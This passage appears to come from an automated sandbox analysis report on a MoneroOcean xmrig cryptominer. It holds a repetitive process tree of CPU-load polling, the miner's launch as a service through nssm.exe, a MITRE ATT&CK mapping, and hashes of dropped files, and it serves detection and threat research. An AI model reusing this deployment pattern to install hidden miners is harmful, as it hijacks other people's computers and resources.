  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3532
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:464
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2560
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:564
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3080
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3620
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2284
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4260
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3760
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5116
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2724
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4976
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3336
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2588
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4656
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4888
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3240
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3940
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2444
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4176
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1360
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4704
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3664
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4420
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2972
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:792
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1948
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1452
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2156
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1504
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1748
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1356
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4136
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1520
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:8
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4364
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1564
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2188
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3356
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3812
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3660
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2360
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3024
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4612
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3736
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5072
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1484
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2452
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5052
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2500
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:704
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3340
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5068
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4140
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4312
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2608
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3268
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2864
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2184
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1944
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5028
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2192
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1432
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:860
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:756
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2712
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2916

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:2640
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71de3d4e6a902c41e5d87b031a5a1910

SHA1
38da8e3af858eb6ad51af0aca573ed73c244cb21

SHA256
19c786a0d1be5f808940dfb0bfcdf3e78a1e4881cb326fabe044b9c7c2970466

SHA512
c3811686eead6874ad81483349e693e1ba89ef4c38d001cfdc5e49c5085d13649940a623a2e3cfd12d3ff887e6d12c11b3a832b09e00577d623cf4d7c03f7554

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a3b0620e76764a3ca7354431d2420627

SHA1
e3254dc9db529da42aa322177451f16538159fc0

SHA256
3ad4b95faf97ba668f1f9c05c94d801c743c4e320dcffad072cc07525034ad54

SHA512
33f9efdf90ed3fbec79738720a8dade5fe464a787f74a26b5bcfa79b74f50f7eaa5c18c5855727b8d29d4de7f8d3accf293287f5c79122be5d06e79c97e89d3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e0bd5fc316bd2de75c21f474e42fa7b6

SHA1
c710434554d958366c0eb674d699c67851cc7865

SHA256
68016a413ada4d31c1f8043756fb0da7ce375b27769abcee09f74f20c87e7a9d

SHA512
adb5ff3c4b2a37eacadbecbf0d371b2ba8ec676a02e744ccd1d717a31e26609c741214b62518868341983c99838cfa3786f951803cd74ff219365e721ea3fbbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6c22756f83518dd77bbf0fd2974cf3d0

SHA1
110c95dc28258500eebfdad5e46bbb184d22a28c

SHA256
09e0d03c29060a13fd39f152d5d7cabc145edafc215000a1910aab8d44e7e911

SHA512
aaf6ae963fef18e19237652f1bad841e597d4ac7c774b5adb0f1569601a5b7580485660fecc044aa6a5027de948e03cfa1001de0eb9237ae41b6d3313fb1dd61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
738d6a6f105aa704d0ca019e3e81c57b

SHA1
a509a1145eb4775ebc64adab4b54efd0ab689505

SHA256
69d713b1912a56d1bca550e47bf7a7610bfe4737db79c7371f03caf8a8ba1d86

SHA512
1d40e7e61ae0af91d959f568f9629bdf7d8b28c4dab52661f9cef1191c93095bd9340d897b8b89ca59358533301c6aa0a7f95c414c0d99fd8651dedb56cb7f09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2bf1c83b091d3b828f8afcbc2acb90d3

SHA1
0704a20a6b6cfefe960e9ef30f3ee3f9ca0a787c

SHA256
339610ce8e274b5310d1dc75c51187f44b78e0fe2bec67a628a1f3cc966f8a1b

SHA512
b2b1e5b90cfd5347303c2640262420920bbf4671dfc1289ba071f27aed347fa2a49a05c26bf14e5819ea6c6b63d30249a0242d702c7f0bbdc7d948fe5d0e3919

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
464d622597c44a7f1c99e99532d5348e

SHA1
cb2aa78e20bfa84b547a28a36b47b10902fd64d8

SHA256
ca9dbde3b65f5648079cbee33b1f639b042752ea0a5c0d027b885eb2e5bf936f

SHA512
565a818d8aff5c04722a6d3b46afd767fe486513e8ee5eff81cd4bb3a25e51124ffc91a4e81e791bda52b984cef22ec0c23a4df656c04358e9a76fe48a6e0769

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
95d7e00fcc7bf2737397838cb408d057

SHA1
55a5ca7f3f59e2ef87386da6774c27a290d25472

SHA256
e6f1f1aced122ca96856498b7d0eb142e85f6754471eafa395ae8349e5eb0070

SHA512
0b78d65a1a26d6876349c005742d16ed7d863010bb027cbb59ea2f06d743ef0851fcc41928a79c6c9c3801e859f6e4a4b68f32adf44902664cae20c12e20116a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0928e8578b948e68c222a7eef72eae5b

SHA1
9664d3d4ce2dea464bd41bf186a273623b67a146

SHA256
956ffc5473e301ddeea06421916b77d7fb478a85bdb45511dc20ffbc523718e9

SHA512
8148e6d7a8ddbf91ff26da3bd64c96e5ca06914bd45ead2299fb7d16cef5aa39583a7a252a95c35614c352b1e94e6b2ee005ab3fc78d127fce89369c837d8c99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
03e38fe524bfae0c9afd5c5fd9982848

SHA1
f1589bf6d4307f6967bab26a81e9ef7972a33803

SHA256
af778e7ac1bf70fca08a43e3dbbfd55c2585bc79763a3802f50d080f67201d9d

SHA512
331f170b66d2f90149d43d78bbb312527de702a7dfeb2283a3a946fab13b8cadfb27982e45c265fa487e3a39eb45403ab48049c0ae7bd144d840a39daaae83d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
969a07b130e6a24f99837abfaae8e214

SHA1
e866d389bcf06f56d2effdcea067c8b9c023ccc1

SHA256
6b336495061db3fe203263fb1a96b43f87a4aa1d494e7337e4e552218152203a

SHA512
e799b27ad1a5ba0cfa6be8a190f5b85ed1e19850289adb653ae3ef6524790fb7e0f5c99470043481702bd81715b97aed5daa3b3538dcb008c3fbe7000a35748e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
39c678c5907c9f0e251777c30933b8ac

SHA1
6c75c4f0f4cf9c0d03c0e81eb37e31fc46125fab

SHA256
3842ffc02e52b8e43fa344490df3192ecda5d8877a785ea4fcc4b2513c603b9c

SHA512
8622e6dd6738bf1319d7c1d3aa8f6fe347ae8b433350caa325783a95e14226899ff3f54f44ac933bedae1542727d375d513d729b609582ad5437b1ed36fbdfa7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
4eb3b8a7517973fafc457f36dab687a8

SHA1
3379eb2f623043cdc6a38bbd9ba781ddcd708cda

SHA256
c043d453bc4d096cd80999cee8288f052f78bf36badfef52c69ad4632baee9e4

SHA512
5821123ca28487681d887ea167f0fa0c069df9a3f9c3e724e55c84449720b28059c408a48500c1eadddcdeb643965be1213b327cc0bd7285a5f68eb80811bfea

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aukywult.l2q.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\script_e39ec5d4.bat

Filesize
556B

MD5
889ed31bd87dcdd18996201e93fca965

SHA1
bebcb6fa0d36fabc6edc469cc3177251bd50dbb8

SHA256
6fd0f837746697ef471db89d8fa9290114c4c2dd416020f5ad9dc1837fb16ee7

SHA512
11e131928d8a7fd30b20943aeda62a9185b9b961fc577a75a6de87635b5a89a13fcbbfbbf0abd8e6a5cdc3052ef98c40bbebb33252ec00e73fcf18debda10f0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp77C0.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
374d79e520fa059beae165d5aab96f0f

SHA1
d782a6a17acc64ef2d3c26021e2db87fc0e65f91

SHA256
6f78c2b414ed82c04f34036e350f12527f904f2ff6886367e1027138074df9b4

SHA512
bde99369ca8bb5f36cd16eabf066dcb0b2d0f2a92e9eb1076c097db73a711a0e8d5857eab854e106b7d2d1d514e9f48f21f659baa30e5a380d06d8978338d9d1

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
168d8bbe3f96474ce4cc071f21bb50fb

SHA1
0587b363abc71a086c2c4fb5ee5c73cd7493a85f

SHA256
3eb869a6fd6b30cdfd75ccafe7440c84fea53b8bfaf0331801d102731e902e9a

SHA512
2a973a586d97fb0da8d7cbb3dc739d6da4e741f6bbb498c52a5d38b8fe6e745d4eca05581539e68fe7685be7f60e01fb6e5934ba2950eddc645004558e975e2d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
6de1dd9f436674a171091b37b5e2294b

SHA1
6cb38c094640da5f943cded02878cc8f6cba0e1a

SHA256
bc0ff78ec921e6ae7af39ff66642d37ac46c6071be7404a816cc0af9bd0f5918

SHA512
af2b905005f97e84c87c597ad9b4989265af62ae9669d08a0ea9b925b2fa2362bf54d75e3f676152c4e2986712d2ae7849733c604bcc49568cabd42fcbd901c0

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/1832-76-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1832-75-0x0000000001290000-0x00000000012B0000-memory.dmp

Filesize
128KB

Download
memory/2148-51-0x000002AFA7800000-0x000002AFA7812000-memory.dmp

Filesize
72KB

Download
memory/2148-50-0x000002AF8F640000-0x000002AF8F64A000-memory.dmp

Filesize
40KB

Download
memory/3920-212-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-228-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-262-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-261-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-260-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-259-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-201-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-202-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-203-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-204-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-205-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-206-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-207-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-208-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-209-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-210-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3920-211-0x0000000000400000-0x000000000102B000-memory.dmp

